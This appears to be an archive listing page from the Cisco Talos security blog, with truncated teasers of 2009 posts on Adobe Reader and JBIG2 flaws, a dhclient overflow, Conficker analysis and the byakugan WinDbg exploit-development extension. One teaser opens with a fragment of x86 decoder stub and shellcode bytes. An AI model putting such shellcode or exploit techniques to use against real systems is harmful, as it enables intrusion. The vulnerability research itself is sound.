Cisco Talos Blog

July 24, 2009 12:08

Adobe 0-day update

We love Adobe. We love the u30. We love 32-bit values that are encoded as somewhere between 1 and 5 bytes. This is certainly a file format which has outlasted its day in the sun (56k modems). Here Adobe mentions a CVE. Keep that in mind. Yesterday, they locked a bug you mi

July 22, 2009 12:56

Don’t read this post

So Lurene is mad at me, me being Matt W. The reason for this is the following conversation. Me: Hey you guys see the US-CERT notice on ISC dhclient overflow? Lurene: Yup, working on coverage right now for release today. Lurene: You do know this vuln is awesome right? Me: How so?

February 22, 2009 12:55

Homebrew patch for Adobe AcroReader 9

People seemed a bit worried about the Adobe Reader bug, so I figured I'd take a bit of time this morning and create a homebrew patch for people to protect themselves with until March 11th rolls around. The patch is just a replacement DLL - AcroRd32.dll to be precise. Take th

February 20, 2009 17:29

Have a nice weekend! (PDF love)

Maybe you read Michael Howard's Twitter feed. If so, you may be wondering why you were asked to turn off JavaScript in Adobe Acrobat Reader. Well, I'm here to tell you that if you were to load a PDF file with an embedded JBIG2 image stream: << /Type /XObject /Subty

February 19, 2009 14:28

Making Conficker Cough Up the Goods

I'm not a malware gal. I really dislike analyzing the stuff. It could be an artifact of a life spent pulling apart Microsoft binaries. When Microsoft releases a binary, everything looks the same; it's not a challenge to figure out what's going on. The only challenge i

January 16, 2009 12:48

Update to byakugan’s identBuf and memDiff functionality

I've added the ability to import files into tracked buffers, and also added the ability to make use of them as a memDiff input type. This means a new format for the !jutsu identBuf command: !jutsu identBuf TYPE NAME [VALUE SIZE] Depending on the TYPE, the rest of the comman

January 15, 2009 16:56

!jutsu memDiff

On request, I've added a memory diffing function to byakugan, which will allow you to compare a segment of memory to any buffer that's tracked with identBuf. Shortly I'll be adding the ability to pull buffers in from files, and even directly from metasploit through a

January 14, 2009 14:56

Preventing Shong from getting her CISSP

$decoder = "\x44\x8b\xec\x45\x45\x45\x45\xeb\x0f\x58\x80\x30\x90\x40\x81" . "\x38\x4f\x4c\x4c\x41\x75\xf4\xeb\x05\xe8\xec\xff\xff\xff"; $shellcode = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x

January 7, 2009 14:49

New byakugan functionality!

I've just added a new jutsu method to byakugan to help you find the address of a particular primitive (DWORD, WORD, or BYTE) in memory. Obviously, this isn't a terribly difficult task - you use the search function in WinDbg. What trackVal will do for you is allow you to s